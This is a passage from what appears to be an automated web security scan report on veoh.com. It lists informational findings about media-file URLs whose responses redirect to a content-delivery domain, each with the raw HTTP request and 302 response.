Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:24 GMT
Connection: close
Location: http://veoh-173.vo.llnwd.net/Vpreviews/i/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.mp4?e=1296785124&ri=5000&rs=90&h=8699e5e8bcb5d2a3ff381cf414b12a95
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=497

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-173.vo.llnwd.net/Vpreviews/i/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.mp4?e=1296785124&amp;ri=5000&amp;rs=90&amp;h=8699e5e8bcb5d2a3ff381cf414b12a95">here</a>
...[SNIP]...

18.31. http://content.veoh.com/flash/i/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.mp4?ct=8918b02524ecf375448d6cf7321f1ae790d69dfe69a7e9b8 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:23 GMT
Connection: close
Location: http://veoh-034.vo.llnwd.net/Vpreviews/i/2216c19cb8554ece17d28dd1e8de9437c333db32.mp4?e=1296785123&ri=5000&rs=90&h=1d640aa739c5805594dcc3e502a0cb3c
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=454

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-034.vo.llnwd.net/Vpreviews/i/2216c19cb8554ece17d28dd1e8de9437c333db32.mp4?e=1296785123&amp;ri=5000&amp;rs=90&amp;h=1d640aa739c5805594dcc3e502a0cb3c">here</a>
...[SNIP]...

18.32. http://content.veoh.com/flash/i/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v19012295Ba3j2w3K/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.mp4?ct=348da190d1a2cd13333aa23ce10f209a490a334e975217d7 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:33 GMT
Connection: close
Location: http://veoh-066.vo.llnwd.net/Vpreviews/i/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.mp4?e=1296785133&ri=5000&rs=90&h=15b4117f0298079f8ca275b0ccd1f038
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=432

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-066.vo.llnwd.net/Vpreviews/i/42cbe39e8f5e7e959c9aae49c5e12121c08da4d5.mp4?e=1296785133&amp;ri=5000&amp;rs=90&amp;h=15b4117f0298079f8ca275b0ccd1f038">here</a>
...[SNIP]...

18.33. http://content.veoh.com/flash/i/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v19044986SycxWpNk/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.mp4?ct=8f9310ea6a272f14fc447f01517ece4740b6d24f276c35d9 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:31 GMT
Connection: close
Location: http://veoh-026.vo.llnwd.net/Vpreviews/i/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.mp4?e=1296785131&ri=5000&rs=90&h=c06e9d92b2482fec18a54bf9021ead08
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=416

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-026.vo.llnwd.net/Vpreviews/i/1aba0f0a6ceed14b7c3807714ffef4c090dc827a.mp4?e=1296785131&amp;ri=5000&amp;rs=90&amp;h=c06e9d92b2482fec18a54bf9021ead08">here</a>
...[SNIP]...

18.34. http://content.veoh.com/flash/i/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v19104214GeMDTRBY/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.mp4?ct=2ac810d41e755bbae1888b253e661c4e0f05666d855bced3 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:39 GMT
Connection: close
Location: http://veoh-097.vo.llnwd.net/Vpreviews/i/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.mp4?e=1296785139&ri=5000&rs=90&h=ae81c655a5fef59efd3360537239b5ca
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=459

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-097.vo.llnwd.net/Vpreviews/i/613df9ebc43bd6f00d4713dcc9acd8a05cbcce8b.mp4?e=1296785139&amp;ri=5000&amp;rs=90&amp;h=ae81c655a5fef59efd3360537239b5ca">here</a>
...[SNIP]...

18.35. http://content.veoh.com/flash/i/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v19225431Gcb9q3AB/ad81f90905f646d0bfcee2e2da7fec53051d2878.mp4?ct=03c7b7104ee84aeef3aeb6ee2d564a46a9eb4b2b4e8caddd HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:36 GMT
Connection: close
Location: http://veoh-173.vo.llnwd.net/Vpreviews/i/ad81f90905f646d0bfcee2e2da7fec53051d2878.mp4?e=1296785136&ri=5000&rs=90&h=3248d93b3503c5920be88d197088880c
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=500

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-173.vo.llnwd.net/Vpreviews/i/ad81f90905f646d0bfcee2e2da7fec53051d2878.mp4?e=1296785136&amp;ri=5000&amp;rs=90&amp;h=3248d93b3503c5920be88d197088880c">here</a>
...[SNIP]...

18.36. http://content.veoh.com/flash/i/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.mp4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/i/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.mp4

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/i/2/v19384918agTFfDaf/c7785f65451cc117cf0b3869508e3cfb3245dc5d.mp4?ct=4ef554ec2116c236b96b4a3630f67c3a2ceb814719a73bdb HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:05:26 GMT
Connection: close
Location: http://veoh-199.vo.llnwd.net/Vpreviews/i/c7785f65451cc117cf0b3869508e3cfb3245dc5d.mp4?e=1296785126&ri=5000&rs=90&h=e85a908c41b20ca5a7e18161cf1f409c
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=486

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-199.vo.llnwd.net/Vpreviews/i/c7785f65451cc117cf0b3869508e3cfb3245dc5d.mp4?e=1296785126&amp;ri=5000&amp;rs=90&amp;h=e85a908c41b20ca5a7e18161cf1f409c">here</a>
...[SNIP]...

18.37. http://content.veoh.com/flash/p/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v18827632jwT69n8C/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll?ct=906fce4bcea54e666365f3c7e0c7bcec262f245aa71ffcab HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:49 GMT
Connection: close
Location: http://veoh-182.vo.llnwd.net/Vpreviews/p/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll?e=1296772189&ri=4500&rs=75&h=c38ed8dad5d2055afde6bf7391c1d60a
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=499

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-182.vo.llnwd.net/Vpreviews/p/b6739bfcade89b77ab0ad6be6fbe93dcb7b59733.fll?e=1296772189&amp;ri=4500&amp;rs=75&amp;h=c38ed8dad5d2055afde6bf7391c1d60a">here</a>
...[SNIP]...

18.38. http://content.veoh.com/flash/p/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v18972805PsBFYKpk/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll?ct=9b128cde0f93636d4101af6f2fed776a7d251687b47d2c19 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:29 GMT
Connection: close
Location: http://veoh-173.vo.llnwd.net/Vpreviews/p/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll?e=1296772169&ri=4500&rs=75&h=d31e6add5eeaae00b20f939b1ee65750
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=495

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-173.vo.llnwd.net/Vpreviews/p/ad0ea62fc5d24d3130777cdc74cdd0109c7aa476.fll?e=1296772169&amp;ri=4500&amp;rs=75&amp;h=d31e6add5eeaae00b20f939b1ee65750">here</a>
...[SNIP]...

18.39. http://content.veoh.com/flash/p/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v189741093prNNZM5/2216c19cb8554ece17d28dd1e8de9437c333db32.fll?ct=19e7bd7f23fd629e4a882d2152d6396db81c77e6d330cd3f HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:19 GMT
Connection: close
Location: http://veoh-034.vo.llnwd.net/Vpreviews/p/2216c19cb8554ece17d28dd1e8de9437c333db32.fll?e=1296772159&ri=4500&rs=75&h=021b9ad1ae1c5d2b263aa1b5f2878474
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Keep-Alive: timeout=5, max=463

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-034.vo.llnwd.net/Vpreviews/p/2216c19cb8554ece17d28dd1e8de9437c333db32.fll?e=1296772159&amp;ri=4500&amp;rs=75&amp;h=021b9ad1ae1c5d2b263aa1b5f2878474">here</a>
...[SNIP]...

18.40. http://content.veoh.com/flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?ct=7689d253804ce0f35d75085f09c5e0afe4ba0636754fd704 HTTP/1.1
Host: content.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __qca=P0-1750536792-1296766390251; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 21:40:58 GMT
Connection: close
Location: http://veoh-221.vo.llnwd.net/Vpreviews/p/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?e=1296770758&ri=4500&rs=75&h=d509f8ee46d34366e93c06e2650e1181
Server: Apache
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-221.vo.llnwd.net/Vpreviews/p/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?e=1296770758&amp;ri=4500&amp;rs=75&amp;h=d509f8ee46d34366e93c06e2650e1181">here</a>
...[SNIP]...

18.41. http://content.veoh.com/flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?ct=7689d253804ce0f35d75085f09c5e0afe4ba0636754fd704 HTTP/1.1
Host: content.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __qca=P0-1750536792-1296766390251; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 21:07:56 GMT
Connection: close
Location: http://veoh-221.vo.llnwd.net/Vpreviews/p/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?e=1296768776&ri=4500&rs=75&h=2430a6f5dbd49ce3a3c2bcab89ebe9cc
Server: Apache
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://veoh-221.vo.llnwd.net/Vpreviews/p/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?e=1296768776&amp;ri=4500&amp;rs=75&amp;h=2430a6f5dbd49ce3a3c2bcab89ebe9cc">here</a>
...[SNIP]...

18.42. http://content.veoh.com/flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.veoh.com
Path:   /flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/p/2/v18978294NGnK88j8/dd4b76fb1f8a58fb4906b7637430a0142c06f6fc.fll?ct=77240a837583fc7bae22c3568cbcffcf802d925d7a132a48 HTTP/1.1
Host: content.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.2.10.1296766388; __qca=P0-1750536792-1296766390251;

Response

HTTP/1.1 302 Found
Content-Length: 343
Date: Thu, 03 Feb 2011 22:04:16 GMT
Connection: close
